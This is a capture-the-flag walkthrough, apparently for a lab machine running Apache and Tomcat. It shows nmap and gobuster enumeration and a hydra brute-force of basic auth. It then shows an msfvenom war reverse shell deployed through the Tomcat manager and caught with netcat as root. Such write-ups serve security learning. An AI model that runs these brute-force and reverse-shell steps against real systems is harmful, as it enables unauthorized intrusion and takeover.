Nmap

First we scan for open ports

# nmap -p- -T4 -sV -sC 10.10.226.164 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 00:13 BST
Nmap scan report for 10.10.226.164
Host is up (0.020s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 48:5b:b2:62:b5:51:14:a8:7a:34:22:fd:87:e3:08:40 (RSA)
|   256 fe:ff:1b:55:97:fb:58:22:6e:14:4f:80:30:92:0c:f5 (ECDSA)
|_  256 7f:e0:6c:2f:c2:35:e9:d2:14:44:07:9a:83:2f:03:51 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1234/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds

Website

Visiting the site on port 80 shows a static page indicating the site is down for maintenance. We run a gobuster to see if we can find anything else we can get to.

# gobuster dir -u http://10.10.226.164 -w /usr/share/wordlists/dirb/common.txt                            
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.226.164
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 292]
/.htaccess            (Status: 403) [Size: 297]
/.htpasswd            (Status: 403) [Size: 297]
/guidelines           (Status: 301) [Size: 319] [--> http://10.10.226.164/guidelines/]
/index.html           (Status: 200) [Size: 168]
/protected            (Status: 401) [Size: 460]
/server-status        (Status: 403) [Size: 301]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Visiting the guidelines directory just displays a simple message, however it does give us a potential username.

Trying the protected directory we see that is just protected by basic authentication, so we use hydra against it.

# hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.226.164 http-get /protected/
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-04 00:28:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.226.164:80/protected/
[80][http-get] host: 10.10.226.164   login: bob   password: *******
[STATUS] attack finished for 10.10.226.164 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-04 00:28:12

We login with the credentials and the page just shows a message saying “This protected page has now moved to a different port.”.

Tomcat

Visiting the web application on port 1234 we see the standard Apache Tomcat page. From here we click on the manager and use the same credentials as before on the basic authenticaion. This grants us access to the manager application.

From here we can deploy a malicious war file to get a reverse shell back. We generate this locally with msfvenom and upload it with the manager application.

# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.18.78 LPORT=6666 -f war -o shell.war
Payload size: 1096 bytes
Final size of war file: 1096 bytes
Saved as: shell.war

Then we just start a listener and click on the shell application. We get a reverse shell as root and can simply cat out the flag.

# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.226.164] 39988

id
uid=0(root) gid=0(root) groups=0(root)
cat /root/flag.txt
ff****************************e1